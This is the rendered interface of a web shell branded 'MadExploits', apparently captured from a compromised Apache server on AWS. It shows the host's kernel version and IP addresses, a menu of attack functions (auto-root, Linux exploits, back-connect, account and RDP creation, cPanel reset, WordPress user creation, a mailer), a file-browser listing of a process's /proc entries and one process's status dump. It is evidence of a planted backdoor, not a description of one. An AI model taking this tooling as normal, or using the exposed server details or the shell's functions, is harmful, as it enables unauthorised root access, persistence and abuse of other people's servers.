Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.190.158.12
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
proc /
140 /
task /
140 /
[ HOME SHELL ]
Name
Size
Permission
Action
attr
[ DIR ]
dr-xr-xr-x
fd
[ DIR ]
dr-x------
fdinfo
[ DIR ]
dr-x------
net
[ DIR ]
dr-xr-xr-x
ns
[ DIR ]
dr-x--x--x
arch_status
0
B
-r--r--r--
auxv
0
B
-r--------
cgroup
0
B
-r--r--r--
children
0
B
-r--r--r--
clear_refs
0
B
--w-------
cmdline
0
B
-r--r--r--
comm
0
B
-rw-r--r--
cpuset
0
B
-r--r--r--
environ
0
B
-r--------
gid_map
0
B
-rw-r--r--
io
0
B
-r--------
limits
0
B
-r--r--r--
loginuid
0
B
-rw-r--r--
maps
0
B
-r--r--r--
mem
0
B
-rw-------
mountinfo
0
B
-r--r--r--
mounts
0
B
-r--r--r--
numa_maps
0
B
-r--r--r--
oom_adj
0
B
-rw-r--r--
oom_score
0
B
-r--r--r--
oom_score_adj
0
B
-rw-r--r--
pagemap
0
B
-r--------
patch_state
0
B
-r--------
personality
0
B
-r--------
projid_map
0
B
-rw-r--r--
sched
0
B
-rw-r--r--
schedstat
0
B
-r--r--r--
sessionid
0
B
-r--r--r--
setgroups
0
B
-rw-r--r--
smaps
0
B
-r--r--r--
smaps_rollup
0
B
-r--r--r--
stack
0
B
-r--------
stat
0
B
-r--r--r--
statm
0
B
-r--r--r--
status
0
B
-r--r--r--
syscall
0
B
-r--------
uid_map
0
B
-rw-r--r--
wchan
0
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : status
Name: watchdogd Umask: 0000 State: S (sleeping) Tgid: 140 Ngid: 0 Pid: 140 PPid: 2 TracerPid: 0 Uid: 0 0 0 0 Gid: 0 0 0 0 FDSize: 64 Groups: NStgid: 140 NSpid: 140 NSpgid: 0 NSsid: 0 Threads: 1 SigQ: 0/63279 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000000000000 SigIgn: ffffffffffffffff SigCgt: 0000000000000000 CapInh: 0000000000000000 CapPrm: 0000003fffffffff CapEff: 0000003fffffffff CapBnd: 0000003fffffffff CapAmb: 0000000000000000 NoNewPrivs: 0 Seccomp: 0 Speculation_Store_Bypass: vulnerable Cpus_allowed: f Cpus_allowed_list: 0-3 Mems_allowed: 00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001 Mems_allowed_list: 0 voluntary_ctxt_switches: 2 nonvoluntary_ctxt_switches: 0
Close